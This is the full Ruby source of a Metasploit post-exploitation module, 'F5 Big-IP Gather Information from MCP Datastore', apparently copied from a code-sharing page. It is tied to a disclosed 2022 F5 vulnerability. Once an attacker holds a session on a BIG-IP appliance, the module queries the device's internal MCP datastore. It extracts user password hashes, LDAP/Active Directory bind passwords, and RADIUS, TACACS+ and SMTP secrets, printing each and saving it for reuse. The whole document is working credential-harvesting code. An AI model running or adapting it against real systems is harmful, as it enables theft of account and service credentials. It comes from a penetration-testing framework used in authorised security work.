Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::File
8
  include Msf::Post::Linux::System
9
  include Msf::Post::Linux::F5Mcp
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name' => 'F5 Big-IP Gather Information from MCP Datastore',
16
        'Description' => %q{
17
          This module gathers various interesting pieces of data from F5's
18
          "mcp" datastore, which is accessed via /var/run/mcp using a
19
          proprietary protocol.
20

21
          Adapted from:  https://github.com/rbowes-r7/refreshing-mcp-tool/blob/main/mcp-getloot.rb
22
        },
23
        'License' => MSF_LICENSE,
24
        'Author' => ['Ron Bowes'],
25
        'Platform' => ['linux', 'unix'],
26
        'SessionTypes' => ['shell', 'meterpreter'],
27
        'References' => [
28
          ['URL', 'https://github.com/rbowes-r7/refreshing-mcp-tool'], # Original PoC
29
          ['URL', 'https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/'],
30
          ['URL', 'https://support.f5.com/csp/article/K97843387'],
31
        ],
32
        'DisclosureDate' => '2022-11-16',
33
        'Notes' => {
34
          'Stability' => [],
35
          'Reliability' => [],
36
          'SideEffects' => []
37
        }
38
      )
39
    )
40

41
    register_options(
42
      [
43
        OptBool.new('GATHER_HASHES', [true, 'Gather password hashes from MCP', true]),
44
        OptBool.new('GATHER_SERVICE_PASSWORDS', [true, 'Gather upstream passwords (ie, LDAP, AD, RADIUS, etc) from MCP', true]),
45
        OptBool.new('GATHER_DB_VARIABLES', [true, 'Gather database variables (warning: slow)', false]),
46
      ]
47
    )
48
  end
49

50
  def gather_hashes
51
    print_status('Gathering users and password hashes from MCP')
52
    users = mcp_simple_query('userdb_entry')
53

54
    unless users
55
      print_error('Failed to query users')
56
      return
57
    end
58

59
    users.each do |u|
60
      print_good("#{u['userdb_entry_name']}:#{u['userdb_entry_passwd']}")
61

62
      create_credential(
63
        jtr_format: Metasploit::Framework::Hashes.identify_hash(u['userdb_entry_passwd']),
64
        origin_type: :session,
65
        post_reference_name: refname,
66
        private_type: :nonreplayable_hash,
67
        private_data: u['userdb_entry_passwd'],
68
        session_id: session_db_id,
69
        username: u['userdb_entry_name'],
70
        workspace_id: myworkspace_id
71
      )
72
    end
73
  end
74

75
  def gather_upstream_passwords
76
    print_status('Gathering upstream passwords from MCP')
77

78
    vprint_status('Trying to fetch LDAP / Active Directory configuration')
79
    ldap_config = mcp_simple_query('auth_ldap_config') || []
80
    ldap_config.select! { |config| config['auth_ldap_config_bind_pw'] }
81
    if ldap_config.empty?
82
      print_status('No LDAP / Active Directory password found')
83
    else
84
      ldap_config.each do |config|
85
        config['auth_ldap_config_servers'].each do |server|
86
          report_cred(
87
            username: config['auth_ldap_config_bind_dn'],
88
            password: config['auth_ldap_config_bind_pw'],
89
            host: server,
90
            port: config['auth_ldap_config_port'],
91
            service_name: (config['auth_ldap_config_ssl'] == 1 ? 'ldaps' : 'ldap')
92
          )
93
        end
94
      end
95
    end
96

97
    vprint_status('Trying to fetch Radius configuration')
98
    radius_config = mcp_simple_query('radius_server') || []
99
    radius_config.select! { |config| config['radius_server_secret'] }
100
    if radius_config.empty?
101
      print_status('No Radius password found')
102
    else
103
      radius_config.each do |config|
104
        report_cred(
105
          password: config['radius_server_secret'],
106
          host: config['radius_server_server'],
107
          port: config['radius_server_port'],
108
          service_name: 'radius'
109
        )
110
      end
111
    end
112

113
    vprint_status('Trying to fetch TACACS+ configuration')
114
    tacacs_config = mcp_simple_query('auth_tacacs_config') || []
115
    tacacs_config.select! { |config| config['auth_tacacs_config_secret'] }
116
    if tacacs_config.empty?
117
      print_status('No TACACS+ password found')
118
    else
119
      tacacs_config.each do |config|
120
        config['auth_tacacs_config_servers'].each do |server|
121
          report_cred(
122
            password: config['auth_tacacs_config_secret'],
123
            host: server,
124
            port: 49,
125
            service_name: 'tacacs+'
126
          )
127
        end
128
      end
129
    end
130

131
    vprint_status('Trying to fetch SMTP configuration')
132
    smtp_config = mcp_simple_query('smtp_config') || []
133
    smtp_config.select! { |config| config['smtp_config_username'] }
134
    if smtp_config.empty?
135
      print_status('No SMTP password found')
136
    else
137
      smtp_config.each do |config|
138
        report_cred(
139
          username: config['smtp_config_username'],
140
          password: config['smtp_config_password'],
141
          host: config['smtp_config_smtp_server_address'],
142
          port: config['smtp_config_smtp_server_port'],
143
          service_name: 'smtp'
144
        )
145
      end
146
    end
147
  end
148

149
  def gather_db_variables
150
    print_status('Fetching db variables from MCP (this takes a bit)...')
151
    vars = mcp_simple_query('db_variable')
152

153
    unless vars
154
      print_error('Failed to query db variables')
155
      return
156
    end
157

158
    vars.each do |v|
159
      print_good "#{v['db_variable_name']} => #{v['db_variable_value']}"
160
    end
161
  end
162

163
  def resolve_host(hostname)
164
    ip = nil
165
    if session.type == 'meterpreter' && session.commands.include?(Rex::Post::Meterpreter::Extensions::Stdapi::COMMAND_ID_STDAPI_NET_RESOLVE_HOST)
166
      result = session.net.resolve.resolve_host(hostname)
167
      ip = result[:ip] if result
168
    else
169
      result = cmd_exec("dig +short '#{hostname}'")
170
      ip = result.strip unless result.blank?
171
    end
172

173
    vprint_warning("Failed to resolve hostname: #{hostname}") unless ip
174

175
    ip
176
  rescue Rex::Post::Meterpreter::RequestError => e
177
    elog("Failed to resolve hostname: #{hostname.inspect}", error: e)
178
  end
179

180
  def report_cred(opts)
181
    netloc = "#{opts[:host]}:#{opts[:port]}"
182
    print_good("#{netloc.ljust(21)} - #{opts[:service_name]}: '#{opts[:username]}:#{opts[:password]}'")
183

184
    if opts[:host] && !Rex::Socket.is_ip_addr?(opts[:host])
185
      opts[:host] = resolve_host(opts[:host])
186
    end
187

188
    service_data = {
189
      address: opts[:host],
190
      port: opts[:port],
191
      service_name: opts[:service_name],
192
      protocol: opts.fetch(:protocol, 'tcp'),
193
      workspace_id: myworkspace_id
194
    }
195

196
    credential_data = {
197
      post_reference_name: refname,
198
      session_id: session_db_id,
199
      origin_type: :session,
200
      private_data: opts[:password],
201
      private_type: :password,
202
      username: opts[:username]
203
    }.merge(service_data)
204

205
    login_data = {
206
      core: create_credential(credential_data),
207
      status: Metasploit::Model::Login::Status::UNTRIED
208
    }.merge(service_data)
209

210
    create_credential_login(login_data)
211
  end
212

213
  def run
214
    gather_hashes if datastore['GATHER_HASHES']
215
    gather_upstream_passwords if datastore['GATHER_SERVICE_PASSWORDS']
216
    gather_db_variables if datastore['GATHER_DB_VARIABLES']
217
  end
218
end
219

220